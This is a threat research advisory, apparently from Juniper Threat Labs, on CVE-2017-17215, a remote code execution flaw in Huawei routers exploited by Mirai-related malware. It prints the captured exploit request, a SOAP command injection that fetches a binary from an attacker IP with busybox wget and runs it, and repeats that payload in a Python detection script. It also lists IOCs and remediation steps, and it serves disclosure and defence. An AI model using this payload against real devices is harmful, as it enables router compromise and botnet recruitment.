Threat Research
Remote Code Execution Vulnerability on Huawei Devices
01.17.18

On November 27, 2017, Juniper Threat Labs discovered a severe vulnerability in select Huawei devices that was being exploited in the wild. The vulnerability gives an attacker remote code execution capability. After analysis confirmed that this was not a previously known vulnerability, Juniper disclosed the issue to Huawei on November 29 and waited for Huawei to provide a patch. The vulnerability has since been assigned CVE-2017-17215. Huawei confirmed that Check Point Software Technologies independently notified them of the same vulnerability. The affected devices are listed on Huawei’s web site at http://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en.

Based on our observations, the beginning of this attack coincided with the U.S. Thanksgiving holiday on November 23. Holidays are a prime window for cyber attacks: more people are browsing the web and fewer security professionals are monitoring the networks.

The attack appeared to target Huawei’s ADSL routers. It used a specific HTTP POST request and parameters to trigger execution of a shell command through the UPnP port of the device. This zero-day vulnerability was used to run a script that downloads a payload from a hardcoded IP address and executes it.

Below is a capture of the attack, taken on November 23, 2017 at 2:33:58 AM.

[Figure: traffic capture of the attack request]

There were many of these attacks, and all of them originated from three IP addresses:

  • 172.106.110.90
  • 172.93.97.219
  • 198.7.59.177

These IP addresses were scanning internet-facing hosts on port 37215 and sending the POST request below:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 452
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-4-amd64
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate

<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>$(busybox wget -g 172.93.97[.]219 -l /tmp/rsh -r /okiru.mips ;chmod +x /tmp/rsh ;/tmp/rsh)</NewStatusURL>
<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>

As the capture above shows, the CnC server is hosted at 172.93.97.219.
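The request above is easy to recognise on the wire: a POST to /ctrlt/DeviceUpgrade_1 whose SOAP Upgrade parameters carry shell command substitution instead of URLs. The following detection helper is an added example written for this post, not Juniper's or Huawei's code. It parses a raw HTTP request, extracts the NewStatusURL and NewDownloadURL parameters of the WANPPPConnection Upgrade action, flags shell metacharacters in them, pulls any (possibly defanged) IPv4 addresses out of the body, and compares the source and referenced addresses against the three attacker IPs listed earlier in the post. The exploit sample is constructed from the capture above (headers trimmed, IP left defanged); the benign sample, its User-Agent and the 192.0.2.10 documentation address are constructed for comparison.

```python
"""Added example: flag CVE-2017-17215 exploit attempts in captured HTTP requests.

Hypothetical detection helper written for this post; it is not Juniper's or Huawei's code.
"""
import re
import xml.etree.ElementTree as ET

# Attacking source IPs named in this post.
KNOWN_ATTACKER_IPS = {"172.106.110.90", "172.93.97.219", "198.7.59.177"}
VULNERABLE_PATH = "/ctrlt/DeviceUpgrade_1"
UPNP_NS = "urn:schemas-upnp-org:service:WANPPPConnection:1"
# Shell metacharacters that have no business in a firmware URL.
SHELL_META = re.compile(r"\$\(|`|;|&&|\|\|")
# IPv4 literal, also matching the defanged "1.2.3[.]4" form used in the post.
IPV4 = re.compile(r"\b(?:\d{1,3}(?:\[\.\]|\.)){3}\d{1,3}\b")


def parse_http_request(raw):
    """Return (method, path, headers, body) for a raw HTTP/1.x request string."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.strip()


def upgrade_params(body):
    """Extract the Upgrade action's parameters (tag -> text) from a SOAP body.

    Returns {} when the body is not XML or carries no WANPPPConnection Upgrade action.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return {}
    upgrade = root.find(".//{%s}Upgrade" % UPNP_NS)
    if upgrade is None:
        return {}
    # Child tags are unqualified in the captured request, so the plain tag is the name.
    return {child.tag: (child.text or "") for child in upgrade}


def assess(raw_request, src_ip=None):
    """Score one request; verdict=True means it matches the exploit pattern."""
    method, path, headers, body = parse_http_request(raw_request)
    params = upgrade_params(body)
    injected = [name for name, value in params.items() if SHELL_META.search(value)]
    referenced = sorted({m.replace("[.]", ".") for m in IPV4.findall(body)})
    path_matches = method == "POST" and path == VULNERABLE_PATH
    return {
        "path_matches": path_matches,
        "injected_params": injected,
        "referenced_ips": referenced,
        "references_known_cnc": any(ip in KNOWN_ATTACKER_IPS for ip in referenced),
        "known_attacker_src": src_ip in KNOWN_ATTACKER_IPS,
        "user_agent": headers.get("user-agent", ""),
        "verdict": path_matches and bool(injected),
    }


# Constructed sample modelled on the capture in this post (headers trimmed, IP defanged as there).
EXPLOIT_REQUEST = (
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
    "User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-4-amd64\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
    '<?xml version="1.0" ?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
    's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    '<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    "<NewStatusURL>$(busybox wget -g 172.93.97[.]219 -l /tmp/rsh -r /okiru.mips ;"
    "chmod +x /tmp/rsh ;/tmp/rsh)</NewStatusURL>"
    "<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>"
    "</u:Upgrade></s:Body></s:Envelope>"
)

# Constructed benign request for comparison: same action, plain URLs, documentation address.
BENIGN_REQUEST = (
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
    "User-Agent: ExampleClient/1.0\r\n"
    "\r\n"
    '<?xml version="1.0" ?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    '<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    "<NewStatusURL>http://192.0.2.10/status.xml</NewStatusURL>"
    "<NewDownloadURL>http://192.0.2.10/firmware.bin</NewDownloadURL>"
    "</u:Upgrade></s:Body></s:Envelope>"
)

if __name__ == "__main__":
    for label, req, src in (("exploit", EXPLOIT_REQUEST, "172.93.97.219"),
                            ("benign", BENIGN_REQUEST, "10.0.0.5")):
        print(label, assess(req, src_ip=src))
```

The verdict rests on the request path plus shell metacharacters inside the Upgrade parameters rather than on the attacker IPs, so it still fires when the same technique is launched from a new address; the IP checks are kept as a separate, lower-confidence signal for correlation.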

We obtained three different payloads from this site. All are Linux binaries that appear to be Mirai-related. One binary had zero VT detections, the second had one initial detection, and the third had two initial detections (six after rescan).

When executed, these binaries connect to their CnC at control.almashosting[.]ru, which happens to resolve to the same IP address as the original download site at 172.93.97[.]219.

Remediation

To protect your devices from this type of attack, follow the steps below:

  1.     If it is not required, do not expose port 37215 to the internet. The easiest way is to disable UPnP on Huawei devices.
  2.     Apply the patch from Huawei.

Additional mitigation steps are listed on Huawei’s security advisory page mentioned above.

IOCs

Binary payload hashes:

  • 5d4845344fde62b312cf1497e2885f98a5b3b97ee8a619ac67c2706bb68f8215
  • a6333e5c8be5da00c3e223687a1de3816ad8dbcc164583209ead452df3727a59

CnC

  • control.almashosting[.]ru
  • 172.106.110.90
  • 172.93.97.219
  • 198.7.59.177
